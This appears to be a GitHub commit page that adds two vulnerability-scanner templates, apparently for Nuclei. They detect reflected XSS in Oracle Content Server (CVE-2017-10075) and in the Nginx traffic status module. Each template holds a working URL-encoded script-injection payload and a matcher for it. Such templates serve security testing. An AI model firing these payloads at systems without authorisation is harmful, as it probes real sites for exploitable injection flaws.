Skip to content

Commit cb9a029

Browse files
authored
Merge pull request #272 from Mad-robot/master
👋👋👋
2 parents b27f657 + f5d35e3 commit cb9a029

File tree

2 files changed

+43
-0
lines changed

2 files changed

+43
-0
lines changed

cves/CVE-2017-10075.yaml

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
id: CVE-2017-10075
2+
3+
info:
4+
name: Oracle Content Server XSS
5+
author: madrobot
6+
severity: medium
7+
8+
requests:
9+
- method: GET
10+
path:
11+
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
12+
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
13+
14+
matchers-condition: and
15+
matchers:
16+
- type: status
17+
status:
18+
- 200
19+
- type: word
20+
words:
21+
- "<script>alert(31337)</script>"
22+
part: body
Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
id: nginx-module-vts-xss
2+
3+
info:
4+
name: Nginx virtual host traffic status module XSS
5+
author: madrobot
6+
severity: medium
7+
8+
requests:
9+
- method: GET
10+
path:
11+
- "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
12+
13+
matchers-condition: and
14+
matchers:
15+
- type: status
16+
status:
17+
- 200
18+
- type: word
19+
words:
20+
- "<script>alert(31337)</script>"
21+
part: body

0 commit comments

Comments
 (0)